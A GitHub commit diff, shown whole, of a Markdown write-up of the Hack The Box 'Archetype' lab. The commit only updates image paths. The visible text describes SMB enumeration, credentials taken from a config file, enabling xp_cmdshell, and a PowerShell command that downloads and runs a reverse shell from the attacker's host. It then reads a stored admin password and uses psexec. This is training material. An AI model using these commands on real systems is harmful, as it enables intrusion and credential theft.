-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
775ae0f
commit 21bd0d8
Showing
28 changed files
with
26 additions
and
20 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,39 +4,39 @@ I've been wanting to get into Hack The Box for a while now. The first machine I' | |
|
||
The first thing we are going to do is an initial Nmap scan with the tags : `-sC` (to tell Nmap to use it's default scripts), `-sV` (to get more information about the services running on the different ports of the machine) and using `-oN` we save the scan in a file. We get the following output: | ||
|
||
![Archetype/nmap_initial.png](Archetype/nmap_initial.png) | ||
![Archetype/nmap_initial.png](/images/Archetype/nmap_initial.png) | ||
|
||
Okay, so we can identify this box as a Windows machine and we find out that there is a Microsoft SQL Server running on port `1433` and there is a Samba on port `445`. | ||
|
||
We also run a more aggressive (`-A`) Nmap scan on all ports (`-p-`) to get more information. The output is as following: | ||
|
||
![Archetype/nmap_all_ports_aggressive.png](Archetype/nmap_all_ports_aggressive.png) | ||
![Archetype/nmap_all_ports_aggressive.png](/imges/Archetype/nmap_all_ports_aggressive.png) | ||
|
||
We don't get any interesting additional information here so let's move to on to enumerating Samba. | ||
|
||
The initial nmap scan tells us that we can access Samba using the `guest` account, so we will do just that using `smbmap`. We use `-u` to specify the user and `-H` to specify the host's IP. | ||
|
||
![Archetype\smbmap.png](Archetype/smbmap.png) | ||
![Archetype\smbmap.png](/images/Archetype/smbmap.png) | ||
|
||
We find out that backups and IPC$ are accessible as read only. So using smbclient we will access the both of them. First let's check out `backups`: | ||
|
||
![Archetype/smbclient_backups.png](Archetype/smbclient_backups.png) | ||
![Archetype/smbclient_backups.png](/images/Archetype/smbclient_backups.png) | ||
|
||
We find an interesting file here, `prod.dtsConfig`. We download it onto our machine using `get`. | ||
|
||
Now let's take a look at `IPC$`: | ||
|
||
![Archetype/smbclient_ipc.png](Archetype/smbclient_ipc.png) | ||
![Archetype/smbclient_ipc.png](/images/Archetype/smbclient_ipc.png) | ||
|
||
As you can see, we are unable to get any information from `IPC$` so let's take a look at `prod.dtsConfig`'s content. | ||
|
||
![Archetype/prod_dtsConfig.png](Archetype/prod_dtsConfig.png) | ||
![Archetype/prod_dtsConfig.png](/images/Archetype/prod_dtsConfig.png) | ||
|
||
We find creds here that look to be for the mssql server: `Archetype/sql_svc:M3g4c0rp123` (Note: the format here is `username:password`) | ||
|
||
Let's try getting in the MSSQL server using the creds we just found. We will be using an impacket script called `mssqlclient.py`. This script is already on kali linux but can be found [here](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py). The full command is: `python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -windows-auth ARCHETYPE/[email protected]`. | ||
|
||
![Archetype/mssql.png](Archetype/mssql.png) | ||
![Archetype/mssql.png](/images/Archetype/mssql.png) | ||
|
||
Great, it worked. The first thing we are going to run is `enable_xp_cmdshell` and we will prepare a powershell reverse shell on our machine that we are going to use to access the machine. | ||
|
||
|
@@ -49,17 +49,17 @@ We are going to host the reverse shell file using the module `http.server` in py | |
|
||
Now we go back to mssql server and run `xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.217/shell.ps1\");"` to download and execute the reverse shell. | ||
|
||
![Archetype/call_revshell.png](Archetype/call_revshell.png) | ||
![Archetype/call_revshell.png](/images/Archetype/call_revshell.png) | ||
|
||
Wouhou we get a call back on our attacking machine and we have a reverse shell. Now let's enumerate the machine to find a way to escalate our privileges. | ||
|
||
On this machine, we are able to take a look at the command history of powershell and if we run: `type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` we get the administrator's password: `MEGACORP_4dm1n!!`. | ||
|
||
![Archetype/history_cmd.png](Archetype/history_cmd.png) | ||
![Archetype/history_cmd.png](/images/Archetype/history_cmd.png) | ||
|
||
Okay great now we just have to reconnect to the machine as administrator using another impacket script, `psexec.py`. We run `python3 /usr/share/doc/python3-impacket/examples/psexec.py [email protected]` and *voilà*! | ||
|
||
![Archetype/psexec.png](Archetype/psexec.png) | ||
![Archetype/psexec.png](/images/Archetype/psexec.png) | ||
|
||
Now we just need to get the flags! | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes
File renamed without changes